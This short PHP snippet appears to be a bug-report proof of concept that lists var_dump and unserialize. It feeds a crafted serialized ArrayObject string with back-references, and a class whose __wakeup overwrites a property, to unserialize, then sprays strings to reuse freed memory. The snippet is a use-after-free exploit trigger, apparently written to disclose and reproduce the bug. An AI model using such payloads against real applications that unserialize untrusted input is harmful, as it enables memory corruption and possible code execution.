- var_dump: documentation ( source)
- unserialize: documentation ( source)
<?php
class test
{
var $ryat;
function __wakeup()
{
$this->ryat = 'ryat';
}
}
$inner = 'x:i:0;O:4:"test":1:{s:4:"ryat";R:3;};m:a:1:{i:0;R:2;}';
$exploit = 'C:11:"ArrayObject":'.strlen($inner).':{'.$inner.'}';
$data = unserialize($exploit);
for($i = 0; $i < 5; $i++) {
$v[$i] = 'hi'.$i;
}
var_dump($data);